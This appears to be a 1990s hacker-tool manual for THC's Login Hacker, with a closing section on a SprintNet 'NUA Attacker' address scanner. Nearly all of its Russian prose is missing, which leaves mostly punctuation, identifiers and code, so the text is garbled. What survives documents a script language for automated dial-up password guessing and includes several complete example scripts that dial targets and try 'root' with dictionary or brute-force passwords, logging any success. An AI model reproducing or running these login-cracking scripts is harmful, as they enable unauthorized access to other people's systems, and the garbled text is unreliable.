,
.
? , , .
,
.
, . ,
. . .
.
. ,
- . , Unix
(auth.crit):
CRITICAL. NetWare
. ,
,
.
, ,
.
, , .
,
, . ,
.
? ,
( ),
. ,
, ,
, 123, "secret" .. Unix ,
, finger
telnet smtp-
.
,
, "PASSWORD:".
.
: Silent Carriers.
Login Hacker.
LOGINH.EXE
Login Hacker.
LH-COMP.EXE
.
X00.EXE
Fossil. .
: X00.EXE E 2
FILE_ID.DIZ
.
HISTORY.DOC
.
LOGINH.DOC
.
SCRIPT.DOC
.
RESULT.DOC
, Login Hacker.
UPDATE.DOC
, .
VH_BASE.DIC
.
LH&SCAVE.TXT
, Scavenger Dialer.
THC&SCAV.SCR SCAVENGER
, LH&SCAVE.TXT.
REBREAK.SCR
Scavenger-. LH&SCAVE.TXT.
HANGUP.SCR
, LH&SCAVE.TXT.
PICKUP.SCR
, LH&SCAVE.TXT.
THC-LH_1.TXT
, .
THC-LH_2.TXT
, .
DEC-SERV.TXT
(: Tron).
PASSCODE.TXT
(: Mind Maniac).
THC.NFO
! , .
LORE.COM
LORE BBS (: Plasmoid).
LOGINH.CFG
.
LOGINH.LOG
.
, .
Hacking
Setup.
LOGINH.SCR
, LH-COMP.EXE.
Login Hacker.
LOGINH.HCK
,
. ,
Brute Force Generator.
, ,
.
. ,
. .
, ,
.
Login Hacker
:
LOGINH.EXE [scriptfile]/[anything] [-Auto] [-Shh:mm] [Ehh:mm]
[scriptfile]
scriptfile
.
[anything]
,
.
[-Auto]
.
[-Shh:mm]
, .
[-Ehh:mm]
, .
[-T]
.
.
[-D]
. ,
.
, Login Hacker
:
LH-COMP.EXE [scriptfile]
[scriptfile]
, .
Login Hacker
, :
L
.
S
.
T
.
I
.
Q
.
, .
, , .
, ,
- . , CONNECT,
ALARM, HANGUP ERROR .
, Print Logoutput
to Screen too.
On-line
ESC
.
F1
.
ALT-B
. .
ALT-C
.
ALT-D
.
ALT-H
HangUp.
ALT-I
.
ALT-J
DOS ( -).
ALT-L
.
ALT-T
. ,
.
( ESC).
, ALT-T ALT-X.
-- Login Hacker. ,
, .
,
.
,
. 99%,
.
, .
, -- . ,
-- .
, # ,
.
#DEFINE .
#NOCARRIER
, hangup.
#START .
#END .
.
logfile phone_nr. -
, , .
LOGFILE=FILENAME
.
.
:
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=NUMBER
DIAL.
, . ,
.
:
PHONE_NR=1-800-WHO-CARES
INIT_MODEM=STRING
Pulse Dialing,
P.
,
AT ( Hacker Setup).
:
INIT_MODEM=Z
( AT Z)
INIT_DATA=STRING
,
. ,
Hacker Setup.
8N1 7E1,
. -- 7 8,
. P (
), E ( ) N (
). ,
:
7/8+E/P/N+1/2.
DIAL_TRIES=NUMBER
0 65535. .
, HANGUP .
:
DIAL_TRIES=3
Standard : 0
: ,
, LOGINH.CFG.
LOGIN_TRIES=NUMBER
0 2300000000.
.
(EOF),
. ,
SEND_NEXT_DIC, NEXT_DIC
Brute Force Generator.
:
LOGIN_TRIES=0
Standard: 0
: ,
, LOGINH.CFG.
DIC(NUMBER)=FILENAME
, .
DIC .
.
Send_Next_DIC (1), Send_DIC (1) Next_DIC (1).
:
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
FROM_DIC(NUMBER)=STRING
,
.
: FROM_DIC(1)=Tracy
BRUTE(NUMBER)=STRING,NUMBER,NUMBER,NUMBER
Brute Force Generator .
Brute Force Generator . Brute Force
Generator .
.
1
a= .
A= .
1=.
$=.
^= .
ASCII.
2
, ,
1 .
, 1
, 2.
. , .
3
,
Brute Force Generator.
4
,
Brute Force Generator.
: 1,
12.
, Brute
Force Generator.
Next_Brute(1), Send_Next_Brute(1) Send_Brute(1).
:
BRUTE(1)=a,1,1,6
Brute Force Generator
: ; ,
; ,
-- .
FROM_BRUTE(number)=STRING
Brute Force Generator.
: ,
1 8 , 1 3
, aaaa, aaab, aaac
..
:
FROM_BRUTE(1)=2527
#NOCARRIER
,
HANGUP. GOTO (*START) GOTO (1),
. ,
. DIAL_TRIES.
#START
,
.
LOG(STRING)
LOG() .
, ,
$ ( ), .
LOG() .
:
LOG(Beginning on $DATE * $TIME)
:
"Beginning on 24-12-96 * 23:00"
LOG_(STRING)
, ,
CRLF (End-Of-Line).
:NUMBER
, : () GOTO.
240 1 240.
.
GOTO, GOSUB, CHECK4OUTPUT CHECK4CARRIER.
: :1
1.
GOTO(NUMBER)
.
#START, #NOCARRIER #END.
: GOTO(#END) ( ).
GOSUB(NUMBER)
GOSUB
. GOSUB,
, , GOSUB RETURN
. , :
GOSUB(#END).
: GOSUB(4)
RETURN
.
,
GOSUB .
RETURN
GOSUB, .
255 GOSUB.
: RETURN
CHECK4CARRIER(NUMBER)
,
.
( GOTO).
, TRUE
NO_CARRIERS.
*NOCARRIER, *START *END.
ON OFF. CHECK4CARRIER(ON)
, , , NOT,
*NoCarrier.
, CHECK4CARRIER(OFF)
DIAL, (
SCAVENGER DIALER).
:
CHECK4CARRIER(#NOCARRIER)
CHECK4CARRIER(5)
CHECK4CARRIER(ON)
CHECK4CARRIER(OFF)
CHECK4OUTPUT(NUMBER)
ALARM:
(OUTPUT) ,
.
*NOCARRIER, *START *END. OFF,
.
:
CHECK4CARRIER(#NOCARRIER)
CHECK4CARRIER(5)
CHECK4CARRIER(OFF)
DIAL
PHONE_NR. ,
: " !".
: DIAL
HANGUP
.
: HANGUP
WAIT4STRING(NUMBER,STRING,NUMBER,
COMMAND,STRING)
.
.
.
, , -- ,
, -- ,
, .
: WAIT4STRING
. : WAIT4STRING(a,b,c,d,e).
a
0 255 .
,
TOTAL TIMEOUT ( #NOCARRIER ,
).
, ,
- .
b
,
.
c
,
. : 0 255 (0=, 1=
).
d
. ,
: ALARM, WAIT4STRING IF.
e
.
.
: WAIT4STRING(15,^M,2,GOTO(1),ogin:)
ogin:
15 . , (^M),
15 ,
ogin:.
15 , ,
GOTO 1.
LOG_SESSION_ON
,
.
: LOG_SESSION_ON
LOG_SESSION_OFF
,
.
: LOG_SESSION_OFF
SEND(STRING)
SEND .
$.
.
, .
:
SEND(echo Hacked you system Time: $TIME - Date:
$DATE > HACKED.TXT)
SEND :
echo HAcked your system Time: 23:00 - Date: 24-12-95 > HACKED.TXT
SEND_()
,
^M. ,
+++.
:
SEND_(n)
SEND_(+++)
SEND_NEXT_DIC(NUMBER)
: SEND_NEXT_DIC(1)
SEND_DIC(NUMBER)
.
: SEND_DIC(1)
NEXT_DIC(NUMBER)
, NUMBER.
: NEXT_DIC(1)
SEND_NEXT_BRUTE(NUMBER)
Brute Force Generator,
.
: SEND_NEXT_BRUTE(1)
SEND_BRUTE(NUMBER)
Brute Force Generator.
: SEND_BRUTE(1)
NEXT_BRUTE(NUMBER)
Brute Force Generator.
: NEXT_BRUTE(1)
IF VARIABLE OPERATOR STRING THEN COMMAND
IF .
:
IF THEN
=,
< >
~.
.
, TRUE.
, WAIT4STRING.
:
IF STRING~ogin THEN GOTO(3)
, (STRING) (~)
ogin, (GOTO) 3.
EXECUTE(STRING)
DOS-, .
.
MS DOS. , $
.
: ,
, fossil.
. X00.EXE E 2
Login Hacker.
: ,
.
:
EXECUTE(C:\SB\VPLAY C:\SB\VOC\HACKED.VOC)
EXECUTE(COPY $LOGFILE C:\HACKED)
ALARM(STRING,COMMAND)
! !
, ,
.
STRING
,
.
COMMAND
. ,
WAIT4STRING.
, , BBS,
.
.
:
ALARM(chat,GOTO(#END))
SET VARIABLE=STRING
#START #NOCARRIER.
, .
: STRING, DIAL_TRIED,
LOGIN_TRIED, S_TMP D_TMP.
:
SET D_TMP=3
D_TMP 3.
INC(DIGIT_VARIABLE)
1.
,
.
: DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES,
LOGIN_TRIED D_TMP.
: INC(D_TMP)
DEC(DIGIT_VARIABLE)
1.
,
.
: DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES,
LOGIN_TRIED D_TMP.
:
DEC(D_TMP)
WAIT(NUMBER)
, , NUMBER.
NUMBER 1 65535.
: WAIT(10) ( )
WAIT_(NUMBER)
, ,
NUMBER. NUMBER 1
65535.
: WAIT(500) ()
BEEP
, !
,
SEND() LOG(). ,
$ (),
, . #DEFINE
. .
STRING
.
STRING2
250 .
DIAL_TRIED
.
LOGIN_TRIED
.
TIME
( ).
, TIME=1505 15:05.
DATE
MMDD. , DATE=503 3 .
DIC(1)
1.
BRUTE(2)
Brute Force Generator 2.
S_TMP
. , .
D_TMP
. , .
IF SET
. #DEFINE .
IF! $
. SEND, LOG WAIT4STRING.
:
IF TIME>1215 THEN GOTO #END
( 12:15).
LOG($DIC(3))
SEND($S_TMP)
.
LOG, SEND WAIT4STRING
^ (). , , , ^M
^^ ... ?, ^A ^Z ^[ ^\ ^]
^^.
:
SEND_(^D)
#DEFINE
<>
#NOCARRIER
< >
#START
< >
#END
,
, .BAK.
.
:
WARNING
- .
, . ,
, , .
, .
ERROR
. -
.
.BAK .
#DEFINE
PHONE_NR=,
LOGFILE=lh&scave.log
DIC(1)=d:\project\hack\word\badpws.dic
;
#NOCARRIER
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
LOG(Carrier lost on $DATE at $TIME)
LOG()
GOTO(#START)
#START
SET S_TMP=UNDEFINE
;SET S_TMP=DEFINE
HANGUP
LOG_SESSION_ON
SET STRING2=
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s pickup.scr)
IF S_TMP=UNDEFINE THEN SEND(AT H1)
EXECUTE(scavenge.exe /nooutput /s thc&scav.scr)
:111
SEND(ATD)
SET D_TMP=0
:112
WAIT(1)
INC(D_TMP)
IF D_TMP>50 THEN GOTO(99)
CHECK4CARRIER(112)
SEND()
;
:1
WAIT(1)
IF STRING2~assw THEN GOTO(2)
GOTO(1)
:2
SEND_NEXT_DIC(1)
WAIT(2)
IF STRING2~ncorr THEN GOTO(3)
GOTO(50)
:3
SET STRING2=
:4
WAIT(1)
IF STRING2~assw THEN GOTO(5)
GOTO(4)
:5
SEND_NEXT_DIC(1)
WAIT(2)
IF STRING2~ncorr THEN GOTO(6)
GOTO(50)
:6
SET STRING2=
:7
WAIT(1)
IF STRING2~assw THEN GOTO(8)
GOTO(7)
:8
SEND_NEXT_DIC(1)
WAIT4STRING(10,,1,GOTO(50),ncorr)
GOTO(99)
:50
BEEP
BEEP
BEEP
LOG(------------- -----------------)---- -------------------)
LOG($DATE $TIME)
LOG()
LOG(PASSWORD: $DIC(1))
LOG()
GOTO(150)
:99
CHECK4CARRIER(OFF)
IF S_TMP=UNDEFINE THEN GOTO(#START)
EXECUTE(scavenge.exe /s rebreak.scr)
;
GOTO(111)
:150
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
GOTO(#END)
#END
: UNIX F.
.
#DEFINE
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)
#START
LOG(------------------------- -----)---- -------------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
DIAL
LOG($STRING)
LOG_SESSION_ON
SEND()
SEND()
WAIT4STRING(15,^M,4,GOTO(1),name)
SEND( )
LOG_SESSION_OFF
:2
SEND(CONNECT HACK.THIS.SYSTEM.EDU)
:3
WAIT4STRING(30,^C,1,GOTO(2),ogin:)
SEND(root)
WAIT4STRING(20,^D,1,GOTO(2),assword:)
SEND_NEXT_DIC(1)
IF STRING~ogin: THEN GOTO(3)
IF STRING~refused THEN GOTO(2)
LOG()
LOG($STRING)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Login : root)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
#DEFINE
INIT_MODEM=AT&N15
INIT_DATA=7E1
LOGFILE=C:\OUTPUT\TELEKOM4.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
BRUTE(1)=1,1,1,12
#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $BRUTE(1))
LOG()
GOTO(#START)
#START
LOG(-----------------------------------)---- ---------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(15,^M,4,GOTO(1),PA)
:2
SEND_NEXT_BRUTE(1)
WAIT4STRING(3,^M,2,GOTO(3),PA)
GOTO(2)
:3
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND(HILFE)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $BRUTE(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
0130-xxxxxx.
;
;
;
; 30xCrLf
; PASSCODE:*****
;
#DEFINE
INIT_MODEM=AT &F L2
INIT_DATA=8N1
LOGFILE=xxxxxx.LOG
PHONE_NR=0130xxxxxx
DIAL_TRIES=5
LOGIN_TRIES=0
DIC(1)=C:\2\thc-lh09\w1.w
#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)
#START
LOG(------------------- ---------)---- -------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(30,.^M,3,GOTO(1),PASS)
:2
set string=
SEND_NEXT_DIC(1)
wait(1)
LOG($DIC(1))
; , !
WAIT4STRING(15,.^M,3,GOTO(3),PASS)
GOTO(2)
:3
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND()
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
Telnet.
#DEFINE
init_modem=z
init_data=8n1
LOGFILE=xxxxxx.log
PHONE_NR=xxxxxx
DIAL_TRIES=0
LOGIN_TRIES=0
DIC(1)=D:\hackusr\dictbig.txt
;dic(2)=d:\hackusr\bigdict2.txt
;dic(3)=d:\hackusr\bigdict3.txt
#NOCARRIER
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG(returning ...)
GOTO(#START)
#START
HANGUP
LOG_SESSION_ON
LOG()
log()
log( HaCK ATTeMPT STaRTeD ......)
log()
log( TaRGeT: $PHONE_NR )
log( DaTe: $DATE )
log( TiMe: $TIME)
log()
log()
log( ......DiaLiNG)
dial
log()
log( ......CoNNeCTeD!)
log()
log()
wait(5)
:1
wait4string(1,^M,5,goto(#start),sername>)
send(fh65)
:2
wait4string(1,^M,5,goto(#start),ocal>)
send(connect 189.25.56.7)
:3
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^C,5,goto(4),ogin:)
send(root)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:4
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^D,5,goto(4),assword:)
send_next_dic(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:5
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:6
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:7
beep
beep
beep
beep
beep
beep
beep
beep
beep
log()
log()
log()
Log(...... HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!!)
log()
log( TaRGeT: $PHONE_NR DaTe: $DATE TiMe: $TIME)
log()
log()
log()
log( ACCouNT: root)
log( PaSSWoRD: DIC(1))
log()
log()
log()
#END
Network User Address Attacker.
P/H/A. NUA Attacker Turbo C 2.0
. Network User Address Attacker
SprintNet. SprintNet
.
logfile
. ,
Net .
. ,
SND390.TXT .
, , , ,
.
UNIX. ,
, , P/H/A
, ,
.
NUAA.EXE
NUA Attacker.
NUAA.DOC
README.PHA
!
SND390.TXT
Net.
NUAA.CFG
.
NUAFILE.PHA
.
LOGFILE.PHA
, .
NUA, .
NUAfile Logfile . NUAFILE.PHA
LOGFILE.PHA -- ,
. , ,
,
EOF.
NUA Attacker :
C:\ >NUAA [/I]
/I
. ,
Begin attack ( ), NUA Attacker
( ,
Net @).
Setup
attack. .
Phone Number
Net (SND390.TXT).
Starting NUA
.
Ending NUA
.
Timeout
.
Log filename
,
.
NUA filename
, (